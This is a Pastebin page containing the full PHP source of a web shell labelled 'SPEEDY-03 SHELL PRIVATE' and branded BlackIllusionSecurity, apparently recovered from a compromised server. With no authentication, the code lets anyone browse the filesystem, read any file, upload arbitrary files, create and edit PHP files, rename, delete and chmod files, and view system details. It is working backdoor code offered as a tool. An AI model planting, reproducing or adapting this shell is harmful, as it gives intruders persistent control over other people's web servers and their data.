ozuma5119

Web File Manager ex_liner.php.suspected

Oct 9th, 2019
277
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.02 KB | None | 0 0
  1. <?php
  2.  
  3. //SPEEDY-03 SHELL PRIVATE
  4. //Redesign By CowoKerensTeam
  5. //
  6.  
  7. error_reporting(0);
  8.  
  9. if(get_magic_quotes_gpc()){
  10. foreach($_POST as $key=>$value){
  11. $_POST[$key] = stripslashes($value);
  12. }
  13. }
  14. echo '<!doctype html>
  15. <html>
  16. <head>
  17. <title>Pr1v XSH3EL</title>
  18. </head>';
  19.  
  20. ?>
  21.  
  22. <style>
  23. @font-face {
  24.   font-family: 'Comic Sans MS';
  25.   font-style: normal;
  26.   font-weight: 400;
  27.   src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
  28. }
  29. body {
  30.    
  31.   background:    #000000;line-height: 1;color: #fff;font-family: Comic Sans MS ;
  32.  
  33.   }
  34.  
  35. table, th, td {
  36.     border-collapse:collapse;
  37.     background: transparent;
  38.     font-family: Comic Sans MS ;
  39.     font-size: 13px;
  40. }
  41. input, textarea { font-family: Comic Sans MS ; }
  42. .table_home, .th_home, .td_home { color:grey;
  43.     border: 1px solid grey;
  44. }
  45. th {
  46.     padding: 10px;
  47. }
  48. .td_home { padding: 7px; }
  49. select {font-family: Comic Sans MS }
  50. a {color:white}
  51. textarea { width: 100%;height: 400px; }
  52. </style>
  53. <?php
  54.  
  55. echo '</head>
  56. <body><b>
  57. <H1><center> &lt;/&gt; <font color="red">BlackIllusionSecurity</font> <font color="dodgerblue">FILE MANAGER</font></center></h1>
  58. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  59.  
  60. <tr><td>
  61.  
  62. <font color="green"><center>'.php_uname().'</center></font><br>';
  63. if(isset($_GET['path'])){
  64. $path = $_GET['path'];
  65. }else{
  66. $path =
  67.  
  68.  
  69. getcwd();
  70.  
  71. }
  72. $path = str_replace('\\','/',$path);
  73. $paths = explode('/',$path);
  74.  
  75. foreach($paths as $id=>$pat){
  76. if($pat == '' && $id == 0){
  77. $a = true;
  78. echo '<font color=#fff><center>$ root@x48 : <a href="?path=/">/</a>';
  79. continue;
  80. }
  81. if($pat == '') continue;
  82. echo '<a href="?path=';
  83. for($i=0;$i<=$id;$i++){
  84. echo "$paths[$i]";
  85. if($i != $id) echo "/";
  86. }
  87. echo '">'.$pat.'</a>/';
  88. }
  89. echo '</font></center></td></tr><tr><td><center>';
  90. if(isset($_FILES['file'])){
  91. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  92. echo '<font color="green">File Upload</font><br />';
  93. }else{
  94. echo '<font color="red">Upload Gagal</font><br />';
  95. }
  96. }
  97. echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />
  98. <input type="submit" value="Uploadd" />
  99. </form></center>
  100. </td></tr>';
  101. if(isset($_GET['filesrc'])){
  102. echo "<tr><td><center>Current File : ";
  103. echo $_GET['filesrc'];
  104. echo '</center></tr></td></table><br />';
  105. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  106. }
  107. //Empety
  108. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
  109. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  110. //Chmod
  111. if($_GET['opt'] == 'chmod'){
  112. if(isset($_POST['perm'])){
  113. if(chmod($_POST['path'],$_POST['perm'])){
  114. echo '<font color="green">Change Permission Done </font><br />';
  115. }else{
  116. echo '<font color="red">Change Permission Error </font><br />';
  117. }
  118. }
  119.  
  120. $hell = $_GET['path'];
  121. $yeah = $_GET['name'];
  122. $patc = "$hell/$yeah";
  123.  
  124. echo '<form method="POST">
  125. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
  126. <input type="hidden" name="path" value="'.$_POST['path'].'">
  127. <input type="hidden" name="opt" value="chmod">
  128. <input type="submit" value="Go" />
  129. </form>';
  130. }
  131. //
  132. elseif($_GET['opt'] == 'btw'){
  133.     $cwd = getcwd();
  134.      echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
  135. New Name : <input name="name" type="text" size="20" value="Folder" />
  136. <input type="hidden" name="path" value="'.$cwd.'">
  137. <input type="hidden" name="opt" value="delete">
  138. <input type="submit" value="Go" />
  139. </form>';
  140. }
  141. //Rename file
  142. elseif($_GET['opt'] == 'rename'){
  143. if(isset($_POST['newname'])){
  144. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  145. echo '<font color="green">Ganti Nama Berhasil </font><br />';
  146. }else{
  147. echo '<font color="red">Ganti Nama Gagal </font><br />';
  148. }
  149. $_POST['name'] = $_POST['newname'];
  150. }
  151. $hell = $_GET['path'];
  152. $yeah = $_GET['name'];
  153. $patc = "$hell/$yeah";
  154. $new = $_POST['newname'];
  155.  
  156. echo '<form method="POST">
  157. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
  158. <input type="hidden" name="path" value="'.$patc.'">
  159. <input type="hidden" name="opt" value="rename">
  160. <input type="submit" value="Go" />
  161. </form>';
  162. }
  163. //File baru
  164. elseif($_GET['opt'] == 'baru'){
  165.    
  166. $hell = $_GET['path'];
  167. $yeah = $_GET['name'];
  168. $patc = "$hell/$yeah";
  169. $new = $_POST['newname'];
  170. $azz = $_POST['path'];
  171. $newz = "$azz/$new";
  172.  
  173.  
  174. if(isset($_POST['src'])){
  175. $fp = fopen($_POST['path'],'w');
  176. if(fwrite($fp,$_POST['src'])){
  177. echo '<font color="green">Membuat File Berhasil [ '.$new.' ]</font><br />';
  178. }else{
  179. echo '<font color="red">Membuat File Gagal</font><br />';
  180. }
  181. fclose($fp);
  182. }
  183.  
  184. echo '<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" value="Create"/></form><br> ';
  185.  
  186. $ho = $_POST['ngaran1'];
  187.  
  188. if(isset($_POST['ngaran'])){
  189. echo '<form method="POST">
  190. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  191. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
  192. <input type="hidden" name="opt" value="edit">
  193. <input type="submit" value="Go" />
  194. </form>';
  195.     }
  196.     }
  197. //Edited file
  198. elseif($_GET['opt'] == 'edit'){
  199. if(isset($_POST['src'])){
  200. $fp = fopen($_POST['path'],'w');
  201. if(fwrite($fp,$_POST['src'])){
  202. echo '<font color="green">Edit File Berhasil </font><br />';
  203. }else{
  204. echo '<font color="red">Edit File Gagal </font><br />';
  205. }
  206. fclose($fp);
  207. }
  208. $hell = $_GET['path'];
  209. $yeah = $_GET['name'];
  210. $patc = "$hell/$yeah";
  211. echo '<form method="POST">
  212. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  213. <input type="hidden" name="path" value="'.$patc.'">
  214. <input type="hidden" name="opt" value="edit">
  215. <input type="submit" value="Go" />
  216. </form>';
  217. }
  218. echo '</center>';
  219. }else{
  220. echo '</table><br /><center>';
  221. //Delete dir and file
  222. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
  223.    
  224. $hell = $_GET['path'];
  225. $yeah = $_GET['name'];
  226. $patc = "$hell/$yeah";
  227.  
  228. //Delete dir
  229. if($_GET['type'] == 'dir'){
  230.  
  231. if(rmdir($patc)){
  232. echo '<font color="green">Menghapus File Berhasil</font><br />';
  233. }else{
  234. echo '<font color="red#">Menghapus File Gagal</font><br />';
  235. }
  236. }
  237. //buat folder
  238. if($_GET['type'] == 'buat'){
  239. $haaa = $_POST['path'];
  240. $heee = $_POST['name'];
  241. $hooo = "$haaa/$heee";
  242. $new = $haaa.'/'.htmlspecialchars($heee);
  243. if(!mkdir($new)){
  244. echo '<font color="red">Gagal Membuat Folder</font><br />';
  245. }else{
  246. echo '<font color="green">Berhasil Membuat Folder</font><br />';
  247. }
  248. }
  249. //Delete file
  250. elseif($_GET['type'] == 'file'){
  251.  
  252. $hell = $_GET['path'];
  253. $yeah = $_GET['name'];
  254. $patc = "$hell/$yeah";
  255.  
  256. if(unlink($patc)){
  257. echo '<font color="green">Menghapus File Berhasil</font><br />';
  258. }else{
  259. echo '<font color="red#">Menghapus File Gagal</font><br />';
  260. }
  261. }
  262. }
  263. echo '</center>';
  264. $scandir = scandir($path);
  265. $pa = getcwd();
  266. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  267. <tr>
  268. <th class=th_home style="background:silver;color:black;"><center>Name</center></th>
  269. <th class=th_home style="background:silver;color:black;" ><center>Size</center></th>
  270. <th class=th_home style="background:silver;color:black;" ><center>Perm</center></th>
  271. <th class=th_home style="background:silver;color:black;" ><center>Options</center></th>
  272. </tr> <tr>
  273. <td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php">+ New File</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir">+ New Dir</a> </td></tr>
  274. ';
  275.  
  276. foreach($scandir as $dir){
  277. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  278. echo "
  279. <tr>
  280. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\">$dir</a></td>
  281. <td class=td_home ><center>DIR</center></td>
  282. <td class=td_home ><center>";
  283. if(is_writable("$path/$dir")) echo '<font color="green">';
  284. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  285. echo perms("$path/$dir");
  286. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  287.  
  288. echo "</center></td>
  289. <td class=td_home ><center>
  290. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\">Chmod</a>
  291.  
  292. </center></td>
  293. </tr>";
  294. }
  295. echo '<br>';
  296. foreach($scandir as $file){
  297. if(!is_file("$path/$file")) continue;
  298. $size = filesize("$path/$file")/1024;
  299. $size = round($size,3);
  300. if($size >= 1024){
  301. $size = round($size/1024,2).' MB';
  302. }else{
  303. $size = $size.' KB';
  304. }
  305.  
  306. echo "<tr>
  307. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  308. <td class=td_home><center>".$size."</center></td>
  309. <td class=td_home><center>";
  310. if(is_writable("$path/$file")) echo '<font color="green">';
  311. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  312. echo perms("$path/$file");
  313. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  314. echo "</center></td>
  315. <td class=td_home><center>
  316. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\">Edit</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\">Chmod</a>
  317. </center></td>
  318. </tr>";
  319. }
  320. echo '</table>
  321. </div>';
  322. }
  323. echo '<br><center>Black Illusion Security</b></body>
  324. </html>';
  325. function perms($file){
  326. $perms = fileperms($file);
  327.  
  328. if (($perms & 0xC000) == 0xC000) {
  329. // Socket
  330. $info = 's';
  331. } elseif (($perms & 0xA000) == 0xA000) {
  332. // Symbolic Link
  333. $info = 'l';
  334. } elseif (($perms & 0x8000) == 0x8000) {
  335. // Regular
  336. $info = '-';
  337. } elseif (($perms & 0x6000) == 0x6000) {
  338. // Block special
  339. $info = 'b';
  340. } elseif (($perms & 0x4000) == 0x4000) {
  341. // Directory
  342. $info = 'd';
  343. } elseif (($perms & 0x2000) == 0x2000) {
  344. // Character special
  345. $info = 'c';
  346. } elseif (($perms & 0x1000) == 0x1000) {
  347. // FIFO pipe
  348. $info = 'p';
  349. } else {
  350. // Unknown
  351. $info = 'u';
  352. }
  353.  
  354. // Owner
  355. $info .= (($perms & 0x0100) ? 'r' : '-');
  356. $info .= (($perms & 0x0080) ? 'w' : '-');
  357. $info .= (($perms & 0x0040) ?
  358. (($perms & 0x0800) ? 's' : 'x' ) :
  359. (($perms & 0x0800) ? 'S' : '-'));
  360.  
  361. // Group
  362. $info .= (($perms & 0x0020) ? 'r' : '-');
  363. $info .= (($perms & 0x0010) ? 'w' : '-');
  364. $info .= (($perms & 0x0008) ?
  365. (($perms & 0x0400) ? 's' : 'x' ) :
  366. (($perms & 0x0400) ? 'S' : '-'));
  367.  
  368. // World
  369. $info .= (($perms & 0x0004) ? 'r' : '-');
  370. $info .= (($perms & 0x0002) ? 'w' : '-');
  371. $info .= (($perms & 0x0001) ?
  372. (($perms & 0x0200) ? 't' : 'x' ) :
  373. (($perms & 0x0200) ? 'T' : '-'));
  374.  
  375. return $info;
  376. }
  377.  
  378. ?>
Advertisement
Add Comment
Please, Sign In to add comment